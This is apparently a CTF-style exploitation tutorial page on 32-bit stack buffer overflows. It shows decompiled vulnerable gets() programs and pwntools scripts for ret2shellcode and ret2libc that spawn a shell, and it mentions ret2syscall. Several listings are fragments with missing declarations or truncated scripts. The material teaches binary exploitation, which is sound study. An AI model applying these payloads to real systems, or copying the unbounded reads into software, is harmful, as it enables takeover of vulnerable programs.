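/*
 * Decompiler (IDA) output for the first target binary.  This program is the
 * vulnerable subject of the write-up, so the defect is deliberately kept and
 * annotated; only the tokens mangled by extraction ("constchar", "return0")
 * are restored so the listing reads as valid C.
 *
 * Returns 0.  The interesting effect is the unbounded read in gets().
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
    /* Decompiler annotation: v4 sits 0x64 bytes below the saved ebp.  gets()
     * writes through &v4 with no bound, so 0x64 bytes of input reach the saved
     * ebp and the next 4 bytes (offset 0x68 from &v4) replace the return
     * address on 32-bit x86. */
    int v4; // [sp+1Ch] [bp-64h]@1

    setvbuf(stdout, 0, 2, 0);      /* mode 2 is _IONBF on glibc: unbuffered */
    /* _bss_start is the decompiler's label for the first object in .bss; the
     * equivalent line in the other listings on this page reads stdin, so this
     * is presumably the stdin FILE pointer.  Mode 1 is _IOLBF on glibc. */
    setvbuf(_bss_start, 0, 1, 0);
    puts("There is something amazing here, do you know anything?");
    /* Intentional vulnerability under study: gets() has no length limit, and
     * v4 is only 4 bytes, so any longer line overflows the stack frame. */
    gets((char *)&v4);
    printf("Maybe I will tell you next time !");
    return 0;
}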
/* Body of the ret2shellcode target's main() (its signature and the
 * declaration of s are missing from this listing).  Two things make the
 * technique work:
 *   - gets(&s) reads an unbounded line into the stack buffer s, so the saved
 *     return address can be overwritten;
 *   - strncpy(buf2, &s, 0x64u) then copies the first 0x64 bytes of that input
 *     into buf2, presumably a global (the exploit on this page uses the fixed
 *     address 0x0804A080, typical of .bss in a non-PIE 32-bit ELF).  A payload
 *     placed there survives at a known address, so the return address can
 *     point at it - provided that region is executable (NX disabled).
 * Caveats for the payload: at most 0x64 bytes are copied, and strncpy stops at
 * the first NUL, so shellcode containing 0x00 arrives truncated in buf2. */
setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 1, 0); puts("No system for you this time !!!"); gets(&s); strncpy(buf2, &s, 0x64u); printf("bye bye ~"); return0; }
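# ret2shellcode: the target copies our input into a global buffer (buf2) with
# strncpy, so the shellcode lands at a fixed, non-stack address and the
# overwritten return address can point straight at it.  This only works when
# that buffer is executable (NX disabled) - confirm with checksec first.
p = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x0804A080  # address of buf2 in the target (non-PIE, so fixed)

# Distance from the start of the input buffer to the saved return address.
RET_OFFSET = 0x6c + 4
# Only the first 0x64 bytes of input are copied into buf2, and the copy stops at
# a NUL byte; fail loudly instead of silently shipping a truncated shellcode.
assert len(shellcode) <= 0x64, "shellcode too long for the 0x64-byte strncpy into buf2"
assert b'\x00' not in shellcode, "shellcode contains NUL; strncpy would truncate it"

p.recvuntil("No system for you this time !!!")
# asm() returns bytes on Python 3, so the pad must be bytes too ('A' would
# raise TypeError); b'A' is also valid on Python 2.
payload = shellcode.ljust(RET_OFFSET, b'A') + p32(buf2_addr)
p.sendline(payload)
sleep(1)
p.interactive()

# Alternative solution: ret2libc, resolving system() / "/bin/sh" with
# LibcSearcher.  The leak stage of that script is not reproduced on this page.
from pwn import *
from LibcSearcher import *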
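# Tail of the ret2libc alternative.  system_addr and binsh_addr come from the
# leak / LibcSearcher stage, which is not shown on this page.
p.recvuntil('No system for you this time !!!')
RET_OFFSET = 0x6c + 4          # distance from the input buffer to the return address
payload = b'A' * RET_OFFSET    # bytes, so concatenating p32() output works on Python 3
payload += p32(system_addr)    # overwritten return address -> system()
payload += p32(0x08048430)     # return address for system() itself; what it points at is not shown here
payload += p32(binsh_addr)     # system()'s argument: pointer to "/bin/sh"
p.sendline(payload)
sleep(1)
p.interactive()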
ret2syscall
ret2syscall,即控制程序执行系统调用,获取 shell。 例子,
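/*
 * Decompiler (IDA) output for the ret2syscall target.  The program is the
 * vulnerable subject of the write-up, so the defect is kept and annotated;
 * only the extraction-mangled tokens ("constchar", "return0") are restored.
 *
 * Returns 0.  The interesting effect is the unbounded read in gets().
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
    /* Decompiler annotation: v4 sits 0x64 bytes below the saved ebp, so 0x64
     * bytes of input reach the saved ebp and the 4 bytes after that (offset
     * 0x68 from &v4) replace the return address on 32-bit x86. */
    int v4; // [esp+1Ch] [ebp-64h]

    setvbuf(stdout, 0, 2, 0); /* mode 2 is _IONBF on glibc: unbuffered   */
    setvbuf(stdin, 0, 1, 0);  /* mode 1 is _IOLBF on glibc: line-buffered */
    /* The banner states the constraints: no system() to return into and no
     * injected code may run.  The section this listing belongs to therefore
     * redirects execution to a system call built from instructions the binary
     * already contains (ret2syscall). */
    puts("This time, no system() and NO SHELLCODE!!!");
    puts("What do you plan to do?");
    /* Intentional vulnerability under study: gets() has no length limit and
     * v4 is only 4 bytes, so any longer line overflows the stack frame. */
    gets(&v4);
    return 0;
}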
/* Body of the ret2libc1 target's main() (its signature and the declaration of
 * s are missing from this listing).  gets(&s) reads an unbounded line into
 * the stack buffer s; that is the overflow the write-up relies on.  The
 * distance from s to the saved return address is not visible in this
 * fragment.  _bss_start is the decompiler's label for the first object in
 * .bss; the equivalent line in the other listings on this page reads stdin,
 * so it is presumably the stdin FILE pointer. */
setvbuf(stdout, 0, 2, 0); setvbuf(_bss_start, 0, 1, 0); puts("Something surprise here, but I don't think it will work."); printf("What do you think ?"); gets(&s); return0; }
from pwn import *
p = process('./ret2libc2') elf = ELF('./ret2libc2')